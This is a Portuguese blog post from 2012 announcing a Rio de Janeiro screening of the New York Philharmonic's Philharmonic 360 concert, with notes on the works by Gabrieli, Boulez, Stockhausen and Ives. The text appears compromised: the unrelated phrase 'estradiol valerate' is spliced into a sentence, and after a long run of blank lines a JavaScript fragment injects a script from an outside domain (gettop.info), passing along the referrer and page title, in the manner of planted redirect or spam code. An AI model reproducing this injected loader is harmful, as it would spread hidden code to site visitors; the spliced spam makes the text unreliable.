Escrito por em 14 ago 2012 nas áreas Cinema, Lateral, Programação, Rio de Janeiro

Cinema cultural no CCJF.

 

SERVIÇO

Centro Cultural da Justiça Federal – Cinema Cultural
Av. Rio Branco, 241
Fone: 21 3261 2550

Dia 1º de setembro, sábado, às 16h.

Ingressos a R$ 10,00 e R$ 5,00

 

Park Avenue Armory - NY

Os DESAFIOS MUSICAIS, com produção de Saulo Chermont, apresentam pela primeira vez no Cinema Cultural do CCJF uma transmissão de vídeo-concerto pela Internet, projeto pioneiro da música clássica em auditórios abertos ao público no Rio de Janeiro, com transmissões da Europa, dos Estados Unidos, da América do Sul e do Oriente.

Para essa estreia foi escolhida a Orquestra Filarmônica de Nova Iorque, com o espetacular programa musical tridimensional do Philharmonic 360, realizado em junho de 2012 no Park Avenue Armory de Nova Iorque.

Programa

O Philharmonic 360 começa com o renascentista Giovani Gabrieli (c.1554-1612) e a obra Canzon XVI, do século 16, com arranjo de Frankenpohl.  Gabrieli, veneziano, organista e professor de música, nesta canzona utiliza uma ampla variedade de texturas e efeitos acústicos.

Park Avenue Armory - interior

Em seguida, uma obra de Pierre Boulez (*1925), francês, que reina na música contemporânea como compositor, regente, teórico e produtor. De sua autoria, estradiol valerate veremos e ouviremos a obra Rituel in memoriam Bruno Maderna, com o maestro Alan Gilbert no pódio, que também conduzirá em semi-palco, o Finale do Ato I de Don Giovanni, ópera de Wolfgang A. Mozart.

O programa continua com a obra Gruppen do compositor alemão Karlheinz Stockhausen (*1928). Peça orquestral que foi concebida para três regentes e orquestras, composta segundo misteriosas regras ligando altura e ritmo, mas o impacto é espacial e tri-dimensional. Ouvir três orquestras em direções diferentes é uma experiência inesquecível. O regente é Alan Gilbert, juntos dois compositores Magnus Lindberg e Matthias Pintscher, como regentes.

O Philharmonic 360 se encerra com a peça The Unanswered Question, de Charles Ives (1874-1954), americano pioneiro modernista, anterior aos seus colegas europeus. Essa obra sobrepõe diversos tipos de música, movendo-se em diferentes velocidades, um fundo de cordas lento, uma série de frases de madeiras, que vão se tornado cada vez mais dissonantes e uma enigmática e recorrente “pergunta sem resposta” do trompete solo.


Próximas apresentações
: 20 de outubro, 17 de novembro e 15 de dezembro, sempre aos sábados às 16 horas.

 

Vídeo da Filarmônica de NY, com Leonard Bernstein, apresentando The Unanswered Question, de Charles Ives.

 

Um vídeo institucional do Philarmonic 360

 

 

 

 

 

 

 

 

 

 

 

 

 

d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário